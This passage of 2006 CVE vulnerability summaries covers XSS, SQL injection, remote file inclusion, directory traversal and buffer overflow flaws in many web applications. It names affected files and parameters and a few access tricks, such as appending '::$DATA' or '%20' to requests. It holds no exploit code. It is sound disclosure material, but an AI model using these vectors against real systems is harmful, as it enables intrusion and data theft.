(3) sub_id, and (4) ad_id parameters to (a) ad.asp, the (5) cid parameter to (b) dircat.asp, and the (6) sid parameter to (c) dirSub.asp. [CVE-2006-6205] Multiple cross-site scripting (XSS) vulnerabilities in result.asp in Enthrallweb eHomes allow remote attackers to inject arbitrary web script or HTML via the (1) city or (2) State parameter. [CVE-2006-6204] Multiple SQL injection vulnerabilities in Enthrallweb eHomes allow remote attackers to execute arbitrary SQL commands via the (1) cid parameter to (a) dircat.asp [CVE-2006-6198] Multiple cross-site scripting (XSS) vulnerabilities in cPanel WebHost Manager (WHM) 3.1.0 allow remote authenticated users to inject arbitrary web script or HTML via the (1) email parameter to (a) scripts2/dochangeemail, the (2) supporturl parameter to (b) cgi/addon_configsupport.cgi, the (3) pkg parameter to (c) scripts/editpkg, the (4) domain parameter to (d) scripts2/domts2 and (e) scripts/editzone, the (5) feature parameter to (g) scripts2/dofeaturemanager, and the (6) ndomain parameter to (h) scripts/park. [CVE-2006-6197] Multiple cross-site scripting (XSS) vulnerabilities in b2evolution 1.8.2 through 1.9 beta allow remote attackers to inject arbitrary web script or HTML via the (1) app_name parameter in (a) _404_not_found.page.php, (b) _410_stats_gone.page.php, and (c) _referer_spam.page.php in inc/VIEW/errors/ [CVE-2006-6196] Cross-site scripting (XSS) vulnerability in the search functionality in Fixit iDMS Pro Image Gallery allows remote attackers to inject arbitrary web script or HTML via a search field (txtsearchtext parameter). [CVE-2006-6188] Cross-site scripting (XSS) vulnerability in view_search.asp in ClickTech Click Gallery allows remote attackers to inject arbitrary web script or HTML via the txtKeyWord parameter. NOTE: some of these details are obtained from third party information. [CVE-2006-6180] Cross-site scripting (XSS) vulnerability in articles.asp in Expinion.net iNews Publisher (iNP) 2.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the hl parameter. NOTE: The provenance of this information is unknown [CVE-2006-6179] Buffer overflow in PCCSRV\Web_console\RemoteInstallCGI\CgiRemoteInstall.exe for Trend Micro OfficeScan 7.3 before build 7.3.0.1089 allows remote attackers to execute arbitrary code via unknown attack vectors. [CVE-2006-6178] Buffer overflow in PCCSRV\Web_console\RemoteInstallCGI\Wizard.exe for Trend Micro OfficeScan 7.3 before build 7.3.0.1087 allows remote attackers to execute arbitrary code via unknown attack vectors. [CVE-2006-6176] Cross-site scripting (XSS) vulnerability in admin.php in Blogn before 1.9.4 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2006-6174] Cross-site scripting (XSS) vulnerability in tDiary before 2.0.3 and 2.1.x before 2.1.4.20061126 allows remote attackers to inject arbitrary web script or HTML via the conf parameter in (1) tdiary.rb and (2) skel/conf.rhtml. [CVE-2006-6166] Cross-site scripting (XSS) vulnerability in jce.php in the JCE Admin Component in Ryan Demmer Joomla Content Editor (JCE) 1.0.4 for Joomla! (com_jce), without the 20060821 jce_patch, allows remote attackers to inject arbitrary web script or HTML via the mosConfig_live_site parameter. [CVE-2006-6162] Cross-site scripting (XSS) vulnerability in tiki-edit_structures.php in TikiWiki 1.9.6 allows remote attackers to inject arbitrary web script or HTML via the pageAlias parameter. NOTE: The provenance of this information is unknown [CVE-2006-6159] Multiple cross-site scripting (XSS) vulnerabilities in newticket.php in DeskPRO 2.0.0 and 2.0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) message or (2) subject parameter. [CVE-2006-6158] Multiple cross-site scripting (XSS) vulnerabilities in (a) PMOS Help Desk 2.4, formerly (b) InverseFlow Help Desk 2.31 and also sold as (c) Ace Helpdesk 2.31, allow remote attackers to inject arbitrary web script or HTML via the (1) id or email parameter to ticketview.php, or (2) the email parameter to ticket.php. [CVE-2006-6156] Cross-site scripting (XSS) vulnerability in auth/message.php in HIOX Star Rating System Script (HSRS) 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string (PHP_SELF). NOTE: The provenance of this information is unknown [CVE-2006-6153] Multiple cross-site scripting (XSS) vulnerabilities in vSpin.net Classified System 2004 allow remote attackers to inject arbitrary web script or HTML via (1) catname parameter to cat.asp or the (2) minprice parameter to search.asp. [CVE-2006-6148] Multiple cross-site scripting (XSS) vulnerabilities in submitlink.asp in JiRos Links Manager allow remote attackers to inject arbitrary web script or HTML via the (1) lName, (2) lURL, (3) lImage, and (4) lDescription parameters. NOTE: some of these details are obtained from third party information. [CVE-2006-6144] The "mechglue" abstraction interface of the GSS-API library for Kerberos 5 1.5 through 1.5.1, as used in Kerberos administration daemon (kadmind) and other products that use this library, allows remote attackers to cause a denial of service (crash) via unspecified vectors that cause mechglue to free uninitialized pointers. [CVE-2006-6142] Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.0 through 1.4.9 allow remote attackers to inject arbitrary web script or HTML via the (1) mailto parameter in (a) webmail.php, the (2) session and (3) delete_draft parameters in (b) compose.php, and (4) unspecified vectors involving "a shortcoming in the magicHTML filter." [CVE-2006-6136] IBM WebSphere Application Server 6.1.0 before Fix Pack 3 (6.1.0.3) does not perform EAL4 authentication checks at the proper time during "registering of response operation," which has unknown impact and attack vectors. [CVE-2006-6135] Multiple unspecified vulnerabilities in IBM WebSphere Application Server 6.1.0 before Fix Pack 3 (6.1.0.3) have unknown impact and attack vectors, related to (1) a "Potential security vulnerability" (PK29725) and (2) "Potential security exposure" (PK30831). [CVE-2006-6131] Untrusted search path vulnerability in (1) WSAdminServer and (2) WSWebServer in Kerio WebSTAR (4D WebSTAR Server Suite) 5.4.2 and earlier allows local users with webstar privileges to gain root privileges via a malicious libucache.dylib helper library in the current working directory. [CVE-2006-6124] Cross-site scripting (XSS) vulnerability in SeleniumServer Web Server 1.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the provenance of this information is unknown [CVE-2006-6118] Cross-site scripting (XSS) vulnerability in thumbs.php in mmgallery 1.55 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-6108] Cross-site scripting (XSS) vulnerability in EC-CUBE before 1.0.1a-beta allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2006-6104] The System.Web class in the XSP for ASP.NET server 1.1 through 2.0 in Mono does not properly verify local pathnames, which allows remote attackers to (1) read source code by appending a space (%20) to a URI, and (2) read credentials via a request for Web.Config%20. [CVE-2006-6096] Cross-site scripting (XSS) vulnerability in activenews_search.asp in ActiveNews Manager allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2006-6091] Cross-site scripting (XSS) vulnerability in Grim Pirate GrimBB before 2006_11_21 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-6089] Multiple cross-site scripting (XSS) vulnerabilities in addpost1.asp in BaalAsp forum allow remote attackers to inject arbitrary web script or HTML via the (1) title (Subject), (2) groupname (Group Name), or (3) detail (Message) field. [CVE-2006-6088] Multiple cross-site scripting (XSS) vulnerabilities in BlueCollar i-Gallery 3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) n or (2) d parameter in igallery.asp, or (3) an unspecified parameter related to search, possibly the Search Gallery field, or the myquery parameter, in search.asp. NOTE: some of these details are obtained from third party information. [CVE-2006-6087] Cross-site scripting (XSS) vulnerability in weblog.php in my little weblog allows remote attackers to inject arbitrary web script or HTML via the action parameter. [CVE-2006-6082] Multiple cross-site scripting (XSS) vulnerabilities in CreaScripts Creadirectory allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter to addlisting.asp or the (2) search parameter to search.asp. [CVE-2006-6075] Cross-site scripting (XSS) vulnerability in addpost1.asp in BaalAsp forum allows remote attackers to inject arbitrary web script or HTML via the name parameter. NOTE: The provenance of this information is unknown [CVE-2006-6074] Multiple SQL injection vulnerabilities in Enthrallweb eShopping Cart allow remote attackers to execute arbitrary SQL commands via (1) the ProductID parameter in (a) reviews.asp, or the (2) cat_id or (3) sub_id parameter in (b) subProducts.asp. NOTE: the productdetail.asp vector is already covered by another identifier. [CVE-2006-6073] Multiple SQL injection vulnerabilities in Enthrallweb eShopping Cart allow remote attackers to execute arbitrary SQL commands via the (1) ProductID parameter in productdetail.asp or the (2) categoryid parameter in products.asp. [CVE-2006-6046] Multiple cross-site scripting (XSS) vulnerabilities in eggblog 3.1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) edit parameter to (a) admin/articles.php or (b) admin/comments.php, or the (2) add parameter to admin/users.php. [CVE-2006-6043] PHP file inclusion vulnerability in loginform-inc.php in Oliver (formerly Webshare) 1.2.2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a UNC share pathname or a local file pathname in the conf[motdfile] parameter, which is accessed by the file_exists function. [CVE-2006-6042] PHP remote file inclusion vulnerability in core/editor.php in phpWebThings 1.5.2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the editor_insert_bottom parameter. [CVE-2006-6040] Multiple cross-site scripting (XSS) vulnerabilities in admincp/index.php in Jelsoft vBulletin 3.6.x allow remote attackers to inject arbitrary web script or HTML via (1) the prefs parameter in a buildnavprefs action or (2) the navprefs parameter in a savenavprefs action. [CVE-2006-6037] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Dan Jensen Travelsized CMS 0.4.1 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) page, (2) page_id, or (3) language parameter. [CVE-2006-6035] Cross-site scripting (XSS) vulnerability in list.php in BLOG:CMS 4.1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the FADDR parameter. [CVE-2006-6032] Multiple cross-site scripting (XSS) vulnerabilities in Simple PHP Blog (SPHPBlog), probably 0.4.8, allow remote attackers to inject arbitrary web script or HTML via (1) the action parameter in add_block.php or (2) the entry parameter in index.php, different vectors than CVE-2005-1135. NOTE: this has been reported to affect 0.8, but as of 20061121, the most recent version is only 0.4.9. [CVE-2006-6022] Cross-site scripting (XSS) vulnerability in login_form.asp in BestWebApp Dating Site allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2006-6021] SQL injection vulnerability in the login component in BestWebApp Dating Site allows remote attackers to execute arbitrary SQL commands via the (1) username and (2) passwd parameters. [CVE-2006-6020] Cross-site scripting (XSS) vulnerability in announce.php in Blog Torrent Preview 0.92 allows remote attackers to inject arbitrary web script or HTML via the left parameter. [CVE-2006-6019] Cross-site scripting (XSS) vulnerability in extensions/googiespell/googlespell_proxy.php in Bill Roberts Bloo 1.0 allows remote attackers to inject arbitrary web script or HTML via the lang parameter. [CVE-2006-6012] Cross-site scripting (XSS) vulnerability in csm/asp/listings.asp in MGinternet Car Site Manager (CSM) allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: the provenance of this information is unknown [CVE-2006-6011] Unspecified vulnerability in SAP Web Application Server before 6.40 patch 6 allows remote attackers to cause a denial of service (enserver.exe crash) via a certain UDP packet to port 64999, aka "two bytes UDP crash," a different vulnerability than CVE-2006-5785. [CVE-2006-6007] save_profile.asp in WebEvents (Online Event Registration Template) 2.0 and earlier allows remote attackers to change the profiles, passwords, and other information for arbitrary users via a modified UserID parameter. [CVE-2006-5991] Multiple SQL injection vulnerabilities in wwweb concepts CactuShop allow remote attackers to execute arbitrary SQL commands via the (1) prodtype parameter in prodtype.asp and the (2) product parameter in product.asp. [CVE-2006-5985] Multiple cross-site scripting (XSS) vulnerabilities in admin/options.php in Extreme CMS 0.9, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) bg1, (2) bg2, (3) text, or (4) size parameters. NOTE: the provenance of this information is unknown [CVE-2006-5984] Multiple cross-site scripting (XSS) vulnerabilities in Helm Web Hosting Control Panel 3.2.10 allow remote authenticated users to inject arbitrary web script or HTML via the (1) txtCompanyName, (2) txtEmail, or (3) txtUserAccNum parameter to (a) users.asp, or the (4) setThemeColour parameter to (b) default.asp in the Reseller and Admin levels [CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level [CVE-2006-5975] Multiple cross-site scripting (XSS) vulnerabilities in comments.asp in BlogMe 3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) URL, or (3) Comments field. [CVE-2006-5960] Multiple cross-site scripting (XSS) vulnerabilities in account_login.asp in A+ Store E-Commerce allow remote attackers to inject arbitrary web script or HTML via the (1) username (txtUserName) and (2) password (txtPassword) parameters. NOTE: portions of these details are obtained from third party information. [CVE-2006-5958] Multiple cross-site scripting (XSS) vulnerabilities in INFINICART allow remote attackers to inject arbitrary web script or HTML via the (1) username and (2) password fields in (a) login.asp, (3) search field in (b) search.asp, and (4) email field in (c) sendpassword.asp. [CVE-2006-5944] Cross-site scripting (XSS) vulnerability in csm/asp/listings.asp in MGinternet Car Site Manager (CSM) allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2006-5943] Multiple SQL injection vulnerabilities in inventory/display/imager.asp in Website Designs for Less Inventory Manager allow remote attackers to execute arbitrary SQL commands via the (1) pictable, (2) picfield, or (3) where parameter. [CVE-2006-5942] Cross-site scripting (XSS) vulnerability in inventory/display/display_results.asp in Website Designs For Less Inventory Manager allows remote attackers to inject arbitrary web script or HTML via the category parameter. [CVE-2006-5931] Multiple PHP remote file inclusion vulnerabilities in Aigaion Web based bibliography management system 1.2.1, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the DIR parameter to certain PHP scripts in (1) lib/actions/, (2) lib/displays/, (3) lib/editforms/, (4) lib/functions/, (5) scheme/, and (6) the root directory. NOTE: the provenance of this information is unknown [CVE-2006-5930] Multiple PHP remote file inclusion vulnerabilities in Aigaion Web based bibliography management system 1.2.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the DIR parameter to (1) _basicfunctions.php, or (2) pageactionauthor.php. [CVE-2006-5925] Links web browser 1.00pre12 and Elinks 0.9.2 with smbclient installed allows remote attackers to execute arbitrary code via shell metacharacters in an smb:// URI, as demonstrated by using PUT and GET statements. [CVE-2006-5924] Cross-site scripting (XSS) vulnerability in index.php in Efficient IP iPmanager (IPm) 2.3 allows remote attackers to inject arbitrary web script or HTML via the errmsg parameter. NOTE: the provenance of this information is unknown [CVE-2006-5921] Multiple cross-site scripting (XSS) vulnerabilities in add_comment.php in Wheatblog (wB) allow remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) WWW, and (3) Comment fields. NOTE: this issue may overlap CVE-2006-5195. [CVE-2006-5918] Unrestricted file upload vulnerability in RapidKill (aka PHP Rapid Kill) 5.7 Pro, and certain other versions, allows remote attackers to upload and execute arbitrary PHP scripts via the "Link to Download" field. NOTE: it is possible that the field value is restricted to files on specific public web sites. [CVE-2006-5915] Multiple cross-site scripting (XSS) vulnerabilities in ls.php in SAMEDIA LandShop allow remote attackers to inject arbitrary web script or HTML via the (1) start, (2) CAT_ID, (3) keyword, (4) search_area, (5) search_type, (6) infield, or (7) search_order parameter. [CVE-2006-5913] Microsoft Internet Explorer 7 allows remote attackers to (1) cause a security certificate from a secure web site to appear invalid via a link to res://ieframe.dll/sslnavcancel.htm with the target site in the anchor identifier, which displays the site's URL in the address bar but causes Internet Explorer to report that the certificate is invalid, or (2) trigger a "The webpage no longer exists" report via a link to res://ieframe.dll/http_410.htm, a variant of CVE-2006-5805. [CVE-2006-5905] Web Directory Pro allows remote attackers to (1) backup the database and obtain the backup via a direct request to admin/backup_db.php or (2) modify configuration via a direct request to admin/options.php. [CVE-2006-5900] Cross-site scripting (XSS) vulnerability in the incubator/tests/Zend/Http/_files/testRedirections.php sample code in Zend Framework Preview 0.2.0 allows remote attackers to inject arbitrary web script or HTML via arbitrary parameters. [CVE-2006-5896] REMLAB Web Mech Designer 2.0.5 allows remote attackers to obtain the full path of the script via an incorrect Tonnage parameter to calculate.php that triggers a divide-by-zero error, which leaks the path in an error message. [CVE-2006-5883] Multiple cross-site scripting (XSS) vulnerabilities in cPanel 10 allow remote authenticated users to inject arbitrary web script or HTML via the (1) dir parameter in (a) seldir.html, and the (2) user and (3) dir parameters in (b) newuser.html. [CVE-2006-5860] Cross-site scripting (XSS) vulnerability in the administrator console for Adobe JRun 4.0, as used in ColdFusion, allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2006-5859] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion MX 7 7.0 and 7.0.1, when Global Script Protection is not enabled, allows remote attackers to inject arbitrary HTML and web script via unknown vectors, possibly related to Linkdirect.cfm, Topnav.cfm, and Welcomedoc.cfm. [CVE-2006-5853] Cross-site scripting (XSS) vulnerability in logon.aspx in Immediacy CMS (Immediacy .NET CMS) 5.2 allows remote attackers to inject arbitrary web script or HTML via the lang parameter, which is returned to the client in a lang cookie. [CVE-2006-5850] Stack-based buffer overflow in Essentia Web Server 2.15 for Windows allows remote attackers to execute arbitrary code via a long URI, as demonstrated by a GET or HEAD request. NOTE: some of these details are obtained from third party information. [CVE-2006-5847] Cross-site scripting (XSS) vulnerability in index.php in FreeWebshop 2.2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the cat parameter. [CVE-2006-5846] Directory traversal vulnerability in index.php in FreeWebshop 2.2.2 and earlier allows remote attackers to read and include arbitrary files via a .. (dot dot) in the page parameter, a different vector than CVE-2006-5773. [CVE-2006-5844] Speedywiki 2.0 allows remote attackers to obtain the full path of the web server via the (1) showRevisions[] and (2) searchText[] parameters in (a) index.php, and (b) a direct request to upload.php without any parameters. [CVE-2006-5843] Cross-site scripting (XSS) vulnerability in index.php in Speedywiki 2.0 allows remote attackers to inject arbitrary web script or HTML via the showRevisions parameter. [CVE-2006-5832] All In One Control Panel (AIOCP) 1.3.007 and earlier allows remote attackers to obtain the full path of the web server via certain requests to (1) public/code/cp_dpage.php, possibly involving the aiocp_dp[] parameter, (2) public/code/cp_show_ec_products.php, possibly involving the order_field[] parameter, and (3) public/code/cp_show_page_help.php, possibly involving the hp[] parameter, which reveal the path in various error messages. [CVE-2006-5830] Multiple cross-site scripting (XSS) vulnerabilities in All In One Control Panel (AIOCP) 1.3.007 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) topid, (2) forid, and (3) catid parameters to code/cp_forum_view.php [CVE-2006-5827] Multiple cross-site scripting (XSS) vulnerabilities in index.php in phpComasy CMS 0.7.9pre and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) username or (2) password parameters. [CVE-2006-5825] Cross-site scripting (XSS) vulnerability in index.php in Kayako SupportSuite 3.00.32 allows remote attackers to inject arbitrary web script or HTML via the query string. [CVE-2006-5819] Verity Ultraseek before 5.7 allows remote attackers to use the server as a proxy for web attacks and host scanning via a direct request to the highlight/index.html script. [CVE-2006-5816] Multiple PHP remote file inclusion vulnerabilities in Dmitry Sheiko Business Card Web Builder (BCWB) 2.5 allow remote attackers to execute arbitrary PHP code via a URL in the root_path_admin parameter to (1) /include/startup.inc.php, (2) dcontent/default.css.php, or (3) system/default.css.php, different vectors than CVE-2006-4946. [CVE-2006-5810] Cross-site scripting (XSS) vulnerability in modules/wfdownloads/newlist.php in XOOPS 1.0 allows remote attackers to inject arbitrary web script or HTML via the newdownloadshowdays parameter. [CVE-2006-5806] SSL VPN Client in Cisco Secure Desktop before 3.1.1.45, when configured to spawn a web browser after a successful connection, stores sensitive browser session information in a directory outside of the CSD vault and does not restrict the user from saving files outside of the vault, which is not cleared after the VPN connection terminates and allows local users to read unencrypted data. [CVE-2006-5805] Microsoft Internet Explorer 7 allows remote attackers to cause a security certificate from a secure web site to appear invalid via a link to res://ieframe.dll/invalidcert.htm with the target site as an argument, which displays the site's URL in the address bar but causes Internet Explorer to report that the certificate is invalid. [CVE-2006-5802] SQL injection vulnerability in message_details.php in The Web Drivers Simple Forum, dated 20060318, allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2006-5800] Cross-site scripting (XSS) vulnerability in default.asp in xenis.creator CMS allows remote attackers to inject arbitrary web script or HTML via the nav parameter. NOTE: the provenance of this information is unknown [CVE-2006-5799] Multiple cross-site scripting (XSS) vulnerabilities in default.asp in xenis.creator CMS allow remote attackers to inject arbitrary web script or HTML via the (1) contid or (2) search parameters. [CVE-2006-5795] Multiple PHP remote file inclusion vulnerabilities in OpenEMR 2.8.1 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the srcdir parameter to (a) billing_process.php, (b) billing_report.php, (c) billing_report_xml.php, and (d) print_billing_report.php in interface/billing/ [CVE-2006-5791] Multiple cross-site scripting (XSS) vulnerabilities in elogd.c in ELOG 2.6.2 and earlier allow remote attackers to inject arbitrary HTML or web script via (1) the filename for downloading, which is not quoted in an error message by the send_file_direct function, and (2) the Type or Category values in a New entry, which is not properly handled in an error message by the submit_elog function. [CVE-2006-5785] Unspecified vulnerability in SAP Web Application Server 6.40 before patch 136 and 7.00 before patch 66 allows remote attackers to cause a denial of service (enserver.exe crash) via a 0x72F2 sequence on UDP port 64999. [CVE-2006-5784] Unspecified vulnerability in enserver.exe in SAP Web Application Server 6.40 before patch 136 and 7.00 before patch 66 allows remote attackers to read arbitrary files via crafted data on a "3200+SYSNR" TCP port, as demonstrated by port 3201. NOTE: this issue can be leveraged by local users to access a named pipe as the SAPServiceJ2E user. [CVE-2006-5776] DISPUTED Multiple PHP remote file inclusions in Ariadne 2.4.1 allows remote attackers to execute arbitrary PHP code via the ariadne parameter in (1) ftp/loader.php and (2) lib/includes/loader.cmd.php. NOTE: this issue is disputed by CVE, since installation instructions recommend that the files be placed outside of the web document root and require the administrator to modify $ariadne in an include file. [CVE-2006-5775] Cross-site scripting (XSS) vulnerability in profile.php in FunkBoard 0.71 before 4 November 2006 at 18:16 GMT allows remote attackers to inject arbitrary web script or HTML, possibly via the name parameter. [CVE-2006-5774] Cross-site scripting (XSS) vulnerability in Hyper NIKKI System before 2.19.9 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2006-5773] Directory traversal vulnerability in index.php in FreeWebshop 2.2.1 and earlier allows remote attackers to read arbitrary files and disclose the installation path via a .. (dot dot) in the action parameter. [CVE-2006-5772] Multiple SQL injection vulnerabilities in index.php in FreeWebshop 2.2.1 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) password and (2) prod parameter. [CVE-2006-5771] Cross-site scripting (XSS) vulnerability in Arkoon SSL360 1.0 and 2.0 before 2.0/2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-5770] Multiple cross-site scripting (XSS) vulnerabilities in ac4p Mobile allow remote attackers to inject arbitrary web script or HTML via (1) Bloks, (2) Newnews, (3) lBlok, and (4) foooot parameter in (a) index.php [CVE-2006-5769] Multiple cross-site scripting (XSS) vulnerabilities in admin.tool CMS 3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) fSid or (2) fSrcBegriffe parameters in unspecified vectors. [CVE-2006-5761] Cross-site scripting (XSS) vulnerability in index.php in Rhadrix If-CMS 1.01 and 2.07 allows remote attackers to inject arbitrary web script or HTML via the rns parameter. [CVE-2006-5759] index.php in Rhadrix If-CMS, possibly 1.01 and 2.07, allows remote attackers to obtain the full path of the web server via empty (1) rns[] or (2) pag[] arguments, which reveals the path in an error message. [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified. [CVE-2006-5744] Multiple SQL injection vulnerabilities in Highwall Enterprise and Highwall Endpoint 4.0.2.11045 management interface allow remote attackers to execute arbitrary SQL commands via an Access Point with a crafted SSID, and via unspecified vectors related to a malicious system operator. [CVE-2006-5742] The AirMagnet Enterprise console and Remote Sensor console (Laptop) in AirMagnet Enterprise before 7.5 build 6307 allows remote attackers to inject arbitrary web script or HTML from a certain embedded Internet Explorer object into an SSID template value, aka "Cross-Application Scripting (XAS)". [CVE-2006-5741] Multiple cross-site scripting (XSS) vulnerabilities in AirMagnet Enterprise before 7.5 build 6307 allow remote attackers to inject arbitrary web script or HTML via (1) the 404 error page of the Smart Sensor Edge Sensor [CVE-2006-5718] Cross-site scripting (XSS) vulnerability in error.php in phpMyAdmin 2.6.4 through 2.9.0.2 allows remote attackers to inject arbitrary web script or HTML via UTF-7 or US-ASCII encoded characters, which are injected into an error message, as demonstrated by a request with a utf7 charset parameter accompanied by UTF-7 data. [CVE-2006-5717] Multiple cross-site scripting (XSS) vulnerabilities in Zend Google Data Client Library (ZendGData) Preview 0.2.0 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters in (1) basedemo.php and (2) calenderdemo.php in samples/, and other unspecified files. [CVE-2006-5715] Easy File Sharing (EFS) Easy Address Book 1.2, when run on an NTFS file system, allows remote attackers to read arbitrary files under the web root by appending "::$DATA" to the end of an HTTP GET request, which accesses the alternate data stream. [CVE-2006-5714] Easy File Sharing (EFS) Web Server 4.0, when running on an NTFS file system, allows remote attackers to read arbitrary files under the web root by appending "::$DATA" to the end of a HTTP GET request, which accesses the alternate data stream. [CVE-2006-5713] Cross-site scripting (XSS) vulnerability in Easy File Sharing (EFS) Web Server 4.0 allows remote attackers to inject arbitrary web script or HTML via the (1) author, (2) content, or (3) title parameters when posting a forum thread. NOTE: the provenance of this information is unknown [CVE-2006-5712] Cross-site scripting (XSS) vulnerability in Mirapoint WebMail allows remote attackers to inject arbitrary web script via the expression Cascading Style Sheets (CSS) function, as demonstrated using the width style for an IMG element. [CVE-2006-5703] Cross-site scripting (XSS) vulnerability in tiki-featured_link.php in Tikiwiki 1.9.5 allows remote attackers to inject arbitrary web script or HTML via a url parameter that evades filtering, as demonstrated by a parameter value containing malformed, nested SCRIPT elements. [CVE-2006-5702] Tikiwiki 1.9.5 allows remote attackers to obtain sensitive information (MySQL username and password) via an empty sort_mode parameter in (1) tiki-listpages.php, (2) tiki-lastchanges.php, (3) messu-archive.php, (4) messu-mailbox.php, (5) messu-sent.php, (6) tiki-directory_add_site.php, (7) tiki-directory_ranking.php, (8) tiki-directory_search.php, (9) tiki-forums.php, (10) tiki-view_forum.php, (11) tiki-friends.php, (12) tiki-list_blogs.php, (13) tiki-list_faqs.php, (14) tiki-list_trackers.php, (15) tiki-list_users.php, (16) tiki-my_tiki.php, (17) tiki-notepad_list.php, (18) tiki-orphan_pages.php, (19) tiki-shoutbox.php, (20) tiki-usermenu.php, and (21) tiki-webmail_contacts.php, which reveal the information in certain database error messages. [CVE-2006-5672] PHP remote file inclusion vulnerability in web/init_mysource.php in MySource CMS 2.16.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the INCLUDE_PATH parameter. [CVE-2006-5661] Cross-site scripting (XSS) vulnerability in nquser.php in VIRtech Netquery allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header. [CVE-2006-5658] BlooMooWeb ActiveX control (AidemATL.dll) allows remote attackers to (1) download arbitrary files via a URL in the bstrUrl parameter to the BW_DownloadFile method, (2) execute arbitrary local files via a file path in the bstrParams parameter to the BW_LaunchGame method, and (3) delete arbitrary files via a file path in the filePath parameter to the BW_DeleteTempFile method. [CVE-2006-5654] Unspecified vulnerability in the Network Security Services (NSS) in Sun Java System Web Server 6.0 before SP 10 and ONE Application Server 7 before Update 3, when SSLv2 is enabled, allows remote authenticated users to cause a denial of service (application crash) via unspecified vectors. NOTE: due to lack of details from the vendor, it is unclear whether this is related to vector 1 in CVE-2006-5201 or CVE-2006-3127. [CVE-2006-5653] Cross-site scripting (XSS) vulnerability in the errorHTML function in the index script in Sun Java System Messenger Express 6 allows remote attackers to inject arbitrary web script or HTML via the error parameter. NOTE: this issue might be related to CVE-2006-5486, however due to the vagueness of the initial advisory and different researchers a new CVE was assigned. [CVE-2006-5652] Cross-site scripting (XSS) vulnerability in Sun iPlanet Messaging Server Messenger Express allows remote attackers to inject arbitrary web script via the expression Cascading Style Sheets (CSS) function, as demonstrated by setting the width style for an IMG element. NOTE: this issue might be related to CVE-2006-5486, however due to the vagueness of the initial advisory and different researchers, it has been assigned a new CVE. [CVE-2006-5643] Cross-site scripting (XSS) vulnerability in search_de.html in foresite CMS allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2006-5639] Unspecified vulnerability in the random number generator in OpenWBEM (Web Based Enterprise Management) 3.2.0 allows attackers to gain privileges via vectors related to "local or HTTP Digest authentication." [CVE-2006-5636] PHP remote file inclusion vulnerability in common.php in Simple Website Software (SWS) 0.99 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the SWSDIR parameter. [CVE-2006-5635] SQL injection vulnerability in forum/search.asp in Web Wiz Forums allows remote attackers to execute arbitrary SQL commands via the KW parameter. [CVE-2006-5632] Cross-site scripting (XSS) vulnerability in change_pass.php in iG Shop 1.4 allows remote attackers to inject arbitrary web script or HTML via the id parameter, a different vulnerability than CVE-2006-5631. NOTE: the provenance of this information is unknown [CVE-2006-5631] Cross-site scripting (XSS) vulnerability in change_pass.php in iG Shop 1.4 allows remote attackers to inject arbitrary web script or HTML via arbitrary query strings when the action parameter is not "1", as demonstrated using script in the action parameter, a different vulnerability than CVE-2006-5632. [CVE-2006-5626] Cross-site scripting (XSS) vulnerability in cms_images/js/htmlarea/htmlarea.php in phpFaber Content Management System (CMS) before 1.3.36 on 20061026 allows remote attackers to inject arbitrary web script or HTML, probably via arbitrary parameters in the query string, as demonstrated with a vigilon parameter. NOTE: earlier downloads of 1.3.36 have the vulnerability [CVE-2006-5625] PHP remote file inclusion vulnerability in wwwdev/nxheader.inc.php in N/X 2002 Professional Edition Web Content Management System (WCMS) 4.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the c[path] parameter. [CVE-2006-5607] Directory traversal vulnerability in /cgi-bin/webcm in INCA IM-204 allows remote attackers to read arbitrary files via a "/./." (modified dot dot) sequences in the getpage parameter. [CVE-2006-5605] Multiple cross-site scripting (XSS) 